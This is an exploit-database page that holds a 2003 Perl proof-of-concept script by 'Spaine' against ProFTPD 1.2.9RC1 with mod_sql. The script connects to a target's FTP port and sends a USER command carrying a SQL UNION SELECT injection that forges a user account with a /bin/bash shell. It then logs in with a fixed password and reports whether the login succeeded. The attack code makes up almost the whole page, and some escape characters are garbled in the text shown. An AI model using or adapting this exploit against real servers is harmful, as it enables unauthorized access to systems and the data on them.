ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
# Published : 2003-06-19
# Author : Spaine
# Previous Title : Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit
# Next Title : Solaris <= 8.0 LPD Command Execution

#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
    print "nProof Of Concept Sql Inject on ProFTPDn";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]nn";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) 
                          or die "Can't connect. n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS pn";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able n";
}else{
    print "[------- Sql Inject Unable n";
}
close $remote;

# www.Syue.com [2003-06-19]